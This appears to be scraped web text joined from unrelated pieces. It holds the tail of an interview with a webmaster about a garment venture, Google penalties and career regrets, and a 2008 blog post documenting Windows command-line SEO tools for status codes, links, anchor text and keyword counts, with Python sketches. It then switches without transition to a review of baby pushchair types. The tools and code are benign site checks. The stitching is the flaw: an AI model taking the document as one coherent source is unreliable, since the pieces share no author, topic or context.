When I finally arrived back in Australia I mentioned that to my Brother in Law (a solicitor) and he said “well, I’ve got some clients that are looking to manufacture a neat new product they’ve developed” - so, before I knew it, I was off to India where I learnt all about ladies underwear, mobilon and thread density. We quickly got a few test shipments under our belt.

Upon returning my brother and I were asked if we’d like to get more deeply involved with the sale and promotion of the product - somehow I let myself be convinced. There began the roller coaster ride - I became manufacturer (traveled to China as well for that part several times), web developer, email wrangler, undy packer, book keeper, promoter and media spokesperson. It was crazy work and it was unpaid - the cost of manufacture and promotion sucked away much of my savings and any profit the product brought in before it ever had a chance to reach my pocket - although attending the modeling shoots was fun, and the POSSIBILITY that it might become something big was intoxicating!

But - a word from the wise - ever heard of Ali Baba and the 40 Thieves? Those folk were in the rag trade. Get involved at your peril.

One of your sites has recently had a strange kind of trouble with Google’s index, with all sorts of possible explanations but no resolution so far. For the average webmaster these kinds of situations are incomprehensible and terribly frustrating. What would you tell the webmaster when stuck in a rut like that - keep working on the problem or let it sit for a while?

First I’d ask them to think about whether they’d made any big changes to their site recently - to try and home in on whether it might be something they’d caused themselves, rather than anything algorithmic.

Next, if I’d decided it might indeed be a penalty, I’d usually give them a copy of the webmaster guidelines and say “What do you think it might be?” - people usually have a fairly good idea about what they might have done wrong if a potential penalty is involved. I’d then ask them to write out a list of potential issues, and correct them + submit a reconsideration request and wait a month. If that didn’t work, time to put on the “mad scientist” hat and get methodical about things.

First I’d probably use Google to do a search for other people experiencing the problem. From there I’d approach these groups. If that drew blanks, I’d then start tweaking things with their site - but softly softly - one change at a time, waiting at least a week between changes so that I’d have a fair idea what ‘the cure’ was for future reference.

If that didn’t work I’d probably just start to assume that they were the victim of Google collateral damage - hell, we all know it happens, and I’d be submitting some attention grabbing posts to this group to try and ‘elevate it’ to the attention of Googlers, so that they could use their gadgetry to try and work out what the story was.

At that stage things are out of your hands, and you just hope that perhaps you’ve alerted Google to a potential “Googlebug” that might stop others from experiencing the same kinds of issues.

Assuming you had full access to Google’s servers and some web designers + programmers to help you, what would you change?

Hmmm.. looking back through my prep notes for my Google interview here…

I think I’d start with the problem of penalties. I’d be sitting down with the alg team and trying to thrash out a way that we could actually help those ‘ma and pa’ webmasters that have accidentally shot themselves in the foot - and to do so without giving the spammers a leg up.

I’d write out a list of things that we considered ‘top secret’ and another of those factors that were ‘out of the bag’, and I’d set about implementing changes to Google webmaster tools to alert folks to little things - like obviously hidden text - that might be resulting in a penalty and which they might not know about. Those kind of issues, to my mind anyway, are already well known amongst spammers and you can’t lose much by letting people know about them.

As for the more complex things, like, for example, keyword density (it’s a simple one, I know, but let’s start there) - you know, things that aren’t black or white - things where there were shades of grey, I’d be making tools to show them which side of the line they are tending towards - like a gauge, or traffic lights.

“We think your site is looking a little spammy - here’s an orange alert”.

Naturally, the alg team would then say to me “Well Matt, that’s all well and good, but if we start giving folks that kind of info, we’re essentially giving the spammers a great tool which they can use to test the limits of our alg, too”. I’d then say to them, well, why don’t we use cluster analysis to break sites down into 100 different categories of ‘spamminess’ - the traffic lights would just show how spammy you are relative to others in your ‘spamminess cluster’ - so really, if we give a green light to a known spammer, all we are telling him is that he’s kind of ok compared to the other spammers within his uber spammer group - but he needn’t know that.
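
A rough sketch of that “relative to your cluster” idea, purely as an illustration. It assumes every site already has a cluster id and a numeric spam score (both hypothetical inputs, nothing Google is known to expose), and the thresholds and the traffic_lights name are made up for the example:

```python
from collections import defaultdict

def traffic_lights(sites, orange_at=0.5, red_at=0.8):
    """Map each site to a light based on its rank inside its own cluster.

    sites: dict of name -> (cluster_id, spam_score); both values are
    assumed to come from some earlier (hypothetical) clustering step.
    """
    by_cluster = defaultdict(list)
    for cluster_id, score in sites.values():
        by_cluster[cluster_id].append(score)

    lights = {}
    for name, (cluster_id, score) in sites.items():
        peers = by_cluster[cluster_id]
        # Fraction of peers in the same cluster with a strictly lower score.
        rank = sum(s < score for s in peers) / len(peers)
        if rank >= red_at:
            lights[name] = "red"
        elif rank >= orange_at:
            lights[name] = "orange"
        else:
            lights[name] = "green"
    return lights
```

Because the rank is computed only against peers in the same cluster, a site with a very high absolute score can still come out green if everything else in its cluster scores even higher, which is the effect described above.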

For the spammers, the lights system would achieve nothing. For the ma’s and pa’s that are relatively innocuous, having a red light could be a huge help - just knowing you have a penalty lets you know that it’s actually something you can track down and correct.

But I suspect the other engineers would raise a whole load of reasons that my approach wouldn’t work - but I love the dynamics of a group, and part of the enjoyment of working in one is often the synergy that you find when you’re sitting down with a whole bunch of folks with common interests and intellect thrashing out a new idea - that’s how a lump of coal turns into a diamond.

That would be a plum position to be in.

After that I’d probably start gravitating towards the alg design / testing side of things - as that’s something I’m fascinated with - setting up mega test networks and conducting sensitivity analysis and pre-testing of new algorithm ideas would be lots of fun and extraordinarily satisfying - I love taking good ideas and helping make them better.

I’ve also thought I’d like to make a tool that shows a graphical representation of the linking structure of a site - with things like nofollow, noindex as an overlay - that could be a great troubleshooting tool for lots of problems too.

But, to be honest, most of my programming experience is at the nuts and bolts level - A GUI to me is a command line and a prompt - I’ve got a lot of engineer in me. I’d be able to write the crawlers and mangle the database, but I’d have to leave the bells and whistles to someone else :-)

You’ve done a lot of different things (so far, including an interview with Google). If you could rewind back to when you started studying, do you think you would do anything differently knowing what you know now (other than obviously buying some good stock)?

Cool! A rewind button!

Firstly, I wouldn’t have flown Qantas to my big interview - it was a debacle start to finish - they lost my bags (clothes, books, notes), and my flights out (and back) were both delayed 12 hours or more and diverted because of tech probs - in short, I arrived sleep deprived and not feeling prepared, and I think I only found my feet during the interview just after lunch. It was like an out-of-body experience.. grrr….

Secondly - I wouldn’t have studied Agriculture.

We had loads of fun out there, but my natural aptitudes are IT / Science / Engineering. My ag degree included a lot of that, but I tended to get let down by the sheer boredom of prac sessions that included watching grass grow - honestly.

I’m the kind of person that thrives on a challenge - so I did poorly at the “watching grass grow” practical subjects, and tended to dux the more academic subjects that others found a tad difficult - like advanced stats, biometry etc - I did the wrong degree for my skillset and, like it or not, time is a depreciating commodity.

I’m an extremely outdoors person, and I thought back then that if I studied IT or engineering I’d be stuck in front of a computer all day - but I now realize that that’s not really the case at all. Shucks, if I’m honest with myself, I LIKE spending time in front of the computer. I’ve come to realise that it’s the life / work balance that’s important - if you don’t have one, you tend to lose out on the other.

So with Ag, I just ended up naturally gravitating towards work that required me to be ‘stuck’ in front of a computer all day anyway, but getting paid poorly for it, so the opportunities to go outside and do adventurous things in your spare time were limited.

I’ve had some massive, great, interesting experiences with the route I chose back then, most of which I don’t regret, but if I’d done IT or Eng instead of Ag, I think I’d be in a better place, career wise. You mention “good stock” - it’s funny that, because luckily I realized early that this wasn’t what I wanted to do long term, and tended to invest my wages well - so I’ve managed to have a decent lifestyle during the recent ‘challenges’, which is LUCKY.

Is there anything you’d like to add?

John - congrats on the new job, and I’m looking forward to achieving a dream like that myself soon, too - good on you mate! :-)

Thank you very much for your time and the replies, Matt!

A set of command-line Windows website tools

3 Sep 2008 In: Uncategorized

If you have to do things over and over again, it’s a good idea to use a tool to make things easier. Windows is a bit limited (or very - when compared to Linux) when it comes to batch file scripts, and “wget” is limited in what it can do right out of the box, so I sat down and wrote a few command line tools to help me with some of the website checks that I like to do.

The tools I included in this set can do the following:

  • Check the result codes for a URL (and follow in the case of a redirect) - or for a list of URLs
  • Create a list of the links found on a URL (or just particular ones)
  • Create a list of the links and anchor texts found on a URL (or just particular ones)
  • Create a simple keyword analysis of the indexable content on a URL

You can get the download from here (requires the Windows .NET runtime v1.1):

  • WebToolbox.zip (140kb)

WebResult

This tool accesses a URL and shows the result code that was returned. If the status is a redirect, it will display the redirection location and optionally follow it to check the final result code. It may be used with a list of URLs. The output is tab-delimited.

Usage:
WebResult [options] (URL|urllist.txt)
Options:
--referer|-r [referrer] (default: none)
--user-agent|-u [user-agent] (default: "WebResult")
--follow-redirect|-f (default: off)
--headers|-h (displays the full response headers)
--verbose|-v

Example:
Check for correct canonical redirect:
Webresult http://johnmu.com/
Webresult http://www.johnmu.com/
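
For readers who want to see what this kind of check involves, here is a minimal Python sketch of the same idea: request a URL without auto-following, record the status code and Location header, then optionally follow the chain. It is not the tool’s actual code (WebResult is a .NET program); the names fetch_status and trace are made up for this example.

```python
import http.client
from urllib.parse import urljoin, urlsplit

REDIRECT_CODES = {301, 302, 303, 307, 308}

def fetch_status(url, user_agent="WebResult-sketch", referer=None):
    """Request one URL without following redirects; return (status, location)."""
    parts = urlsplit(url)
    if parts.scheme == "https":
        conn = http.client.HTTPSConnection(parts.netloc, timeout=10)
    else:
        conn = http.client.HTTPConnection(parts.netloc, timeout=10)
    headers = {"User-Agent": user_agent}
    if referer:
        headers["Referer"] = referer
    path = parts.path or "/"
    if parts.query:
        path += "?" + parts.query
    try:
        conn.request("GET", path, headers=headers)
        response = conn.getresponse()
        return response.status, response.getheader("Location")
    finally:
        conn.close()

def trace(url, fetch=fetch_status, max_hops=10):
    """Follow redirects hop by hop; return a list of (url, status, location)."""
    hops = []
    for _ in range(max_hops):
        status, location = fetch(url)
        hops.append((url, status, location))
        if status not in REDIRECT_CODES or not location:
            break
        # Location may be relative, so resolve it against the current URL.
        url = urljoin(url, location)
    return hops
```

Passing the fetch function as a parameter makes it easy to try the redirect logic against canned responses before pointing it at a live site.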

WebLinks

This tool lists the links that are found on a URL. Note that it has an integrated HTML/XHTML parser - if the code on the page is not fully compliant, there is a chance of the parser not recognizing all links (it is fairly fail-safe, though).

This tool can use a cached version of the URL (from either this tool or one of the other ones) to save bandwidth. The cached versions are saved in the user’s temp-folder.

You have the choice of listing only outbound links or only insite links (to help simplify the output). Additionally, links with the HTML microformat “rel=nofollow” may be marked as such. The output is in alphabetical order.

Usage:
WebLinks [options] (URL|urllist.txt)
Options:
--referer [referrer] (default: none)
--user-agent [user-agent] (default: "WebLinks")
--insite-only|-i (default: both in + out)
--outbound-only|-o (default: both in + out)
--ignore-nofollow|-n (default: off)
--cache|-c (default: off)
--verbose|-v (default: off)

Example:
Check the outbound links on a site.
WebLinks -o http://johnmu.com/
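
As an illustration of the technique (not the tool’s own parser), the following Python sketch collects the links from a page’s HTML, resolves them against the page URL, flags rel=nofollow, and filters by insite or outbound. The names LinkCollector and list_links, and the rule that “insite” means “same host name”, are assumptions made for the example.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

class LinkCollector(HTMLParser):
    """Collect (absolute_url, is_nofollow) for every <a href=...> tag."""

    def __init__(self, base_url):
        super().__init__()
        self.base_url = base_url
        self.links = []

    def handle_starttag(self, tag, attrs):
        if tag != "a":
            return
        attrs = dict(attrs)
        href = attrs.get("href")
        if not href:
            return
        rel_tokens = (attrs.get("rel") or "").lower().split()
        self.links.append((urljoin(self.base_url, href), "nofollow" in rel_tokens))

def list_links(html, base_url, scope="both"):
    """Return sorted, de-duplicated links; scope is 'both', 'insite' or 'outbound'."""
    collector = LinkCollector(base_url)
    collector.feed(html)
    base_host = urlsplit(base_url).netloc.lower()
    found = set()
    for url, nofollow in collector.links:
        parts = urlsplit(url)
        if parts.scheme not in ("http", "https"):
            continue  # skip mailto:, javascript: and similar
        insite = parts.netloc.lower() == base_host
        if scope == "insite" and not insite:
            continue
        if scope == "outbound" and insite:
            continue
        found.add((url, nofollow))
    return sorted(found)
```

Note that with this simple host comparison, johnmu.com and www.johnmu.com count as different sites; a real tool may well treat them as the same.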

WebAnchors

This tool lists the links and anchor text as found on a URL. It uses the same HTML/XHTML parser as WebLinks. It can be used to find certain links (based on the URL, domain name, URL-snippets, or even parts of the anchor text). If the anchor for a link is an image, it will use the appropriate ALT-text, etc.

Usage:
WebAnchors [options] (URL|urllist.txt)
Options:
--referer|-r [referrer] (default: none)
--user-agent|-u [user-agent] (default: "WebLinks")
--find-url|-f http://URL
--find-domain|-d DOMAIN.TLD
--find-anchor|-a TEXT
--find-url-snippet|-s TEXT
--url-only|-o (default: show anchor text as well)
--skip-nofollow|-n (default: off)
--cache|-c (default: off)
--verbose|-v (default: off)

Example:
Check the links with “Google” in the anchor text.
WebAnchors -a "Google" http://johnmu.com/

WebKeywords

This tool does a simple keyword analysis on the indexable content of a URL. It also uses the above HTML/XHTML parser to extract the indexable text. It is possible to get single-word keywords or to use multi-word-phrases. The output is tab-delimited for re-use.

Usage:
WebKeywords [options] (URL|urllist.txt)
Options:
--referer|-r [referrer] (default: none)
--user-agent|-u [user-agent] (default: "WebLinks")
--verbose|-v (default: off)
--words|-w [NUM] (phrases with number of words, default: 1)
--ignore-numbers|-n (default: off)
--cache|-c (cache web page, default: off)
Example:
Extract 3-word keyphrases from a page:
Webkeywords -w 3 http://johnmu.com/
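
To make “simple keyword analysis” concrete, here is a small Python sketch of one way to do it: pull the visible text out of the HTML, split it into words, and count every run of N consecutive words. How the real tool decides what is “indexable” is not documented here, so skipping only script and style content is an assumption, as are the names TextExtractor and count_phrases.

```python
import re
from collections import Counter
from html.parser import HTMLParser

class TextExtractor(HTMLParser):
    """Collect text nodes, ignoring anything inside <script> or <style>."""

    SKIP = {"script", "style"}

    def __init__(self):
        super().__init__()
        self.chunks = []
        self._skip_depth = 0

    def handle_starttag(self, tag, attrs):
        if tag in self.SKIP:
            self._skip_depth += 1

    def handle_endtag(self, tag):
        if tag in self.SKIP and self._skip_depth:
            self._skip_depth -= 1

    def handle_data(self, data):
        if not self._skip_depth:
            self.chunks.append(data)

def count_phrases(html, words=1, ignore_numbers=False):
    """Count phrases of `words` consecutive words in the page text."""
    extractor = TextExtractor()
    extractor.feed(html)
    extractor.close()
    tokens = re.findall(r"\w+", " ".join(extractor.chunks).lower())
    if ignore_numbers:
        tokens = [t for t in tokens if not t.isdigit()]
    # zip over shifted copies of the token list yields each run of N words.
    grams = zip(*(tokens[i:] for i in range(words)))
    return Counter(" ".join(gram) for gram in grams)
```

Calling count_phrases(html, words=3).most_common(20) gives a list of the 20 most frequent three-word phrases, which can be written out tab-delimited for use in a spreadsheet.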

Combined usage of these tools

Find common keyphrases on sites linked from a page (uses a temporary file to store the URLs):

webanchors -c -o -a "Google" http://johnmu.com >temp.txt
webkeywords -c -w 3 temp.txt

Check result codes of all URLs linked from a page:

weblinks -c http://johnmu.com >temp.txt
webresult temp.txt >links.tsv

Compare result codes for multiple accesses:

echo. >results.tsv
for /L %i IN (1,1,100) DO webresult http://johnmu.com/ >>results.tsv

Or, a more complicated example, to test for a hack based on the referrer (all on one line):

for /L %i IN (1,1,100) DO webresult -u "Mozilla/5.0 (Windows; U) Gecko/20070725 Firefox/2.0.0.6" -r http://www.google.com/search?q=johnmu http://johnmu.com/ >>results.tsv
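
Once results.tsv holds a hundred rows, the interesting question is whether every access returned the same code. A minimal Python sketch for tallying them follows; the exact column layout of WebResult’s output is not described above, so the position of the result code (code_column) is an assumption to adjust, and tally_codes is a made-up name.

```python
import csv
import io
from collections import Counter

def tally_codes(tsv_text, code_column=1):
    """Count how often each result code appears in tab-delimited text.

    code_column is the zero-based column assumed to hold the result code.
    """
    counts = Counter()
    for row in csv.reader(io.StringIO(tsv_text), delimiter="\t"):
        # Blank lines (such as the one written by "echo.") have no columns.
        if len(row) > code_column and row[code_column].strip():
            counts[row[code_column].strip()] += 1
    return counts
```

A tally such as 97 x “200” and 3 x “302” would suggest a redirect that only fires occasionally, which is the pattern this kind of hack tends to show.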

I’d love to hear about your usage of these tools :) .

Baby pushchairs (or strollers, as they are also known), such as Obaby pushchairs and Petite Star prams, are becoming more and more elaborate in their design. This review outlines the basic concept of each type of baby pushchair and its advantages and disadvantages.

For a new baby, you have the choice of going for a traditional pram or a multi-purpose stroller, which can do both jobs with a few adjustments. A pram looks nice, but some of the better ranges can be expensive, especially as a pram may only be used for the first few weeks. However, a pram can double up as a second cot until the baby gets larger.

A second issue the pram has compared to the stroller is its size. Prams are ideal for walking on a rough path or in the park, but they are almost impossible to get onto most coaches and they are also hard to steer in a busy shopping area.

In recent years, baby pushchairs and strollers have become more popular, as they are generally more compact and lighter but still offer the stability of a pram. A baby buggy can also be used for many more months than a pram, even for years, depending on the type you go for.

Standard Baby Strollers - The standard stroller looks the most like the traditional pram out of all the designs. It is also the type that can do the widest range of tasks. As well as working as a buggy, it normally has a large amount of space for bags and accessories and also often comes with a detachable cot or newborn carrier. A good all-rounder.

Umbrella Baby Strollers / Buggies - The umbrella baby buggy is the lightest and most compact of them all, and probably the most popular for those reasons. These strollers are easier to take on buses and trains and will fit easily into the car boot. They generally come with a rain hood and a small carrying tray / net underneath.

There is an even lighter version of this stroller, which doesn’t have a hood or any carrying compartments. It’s very transportable, but you have to hope it doesn’t rain!

All Terrain Baby Strollers - This type of baby buggy is often a 3 wheeler and is the most stylish of the bunch. In fact, many parents go for this type for its looks as much as anything else. They can often be more pricey due to their sleek design but do offer a comfortable ride for both passenger and pusher. Bear in mind that many of these strollers are heavier than ordinary models.

Jogging Baby Strollers - Like the all terrain buggy, these have air filled tires, which of course can puncture. They give a smoother ride and are capable of tackling rougher ground in all weather. The idea is that you can keep fit while taking your youngster out, as long as the baby is old enough.

Each baby stroller offers features which may or may not be suitable for you, so when you buy your pushchair, keep in mind how and where you are going to use it and you won’t go far wrong.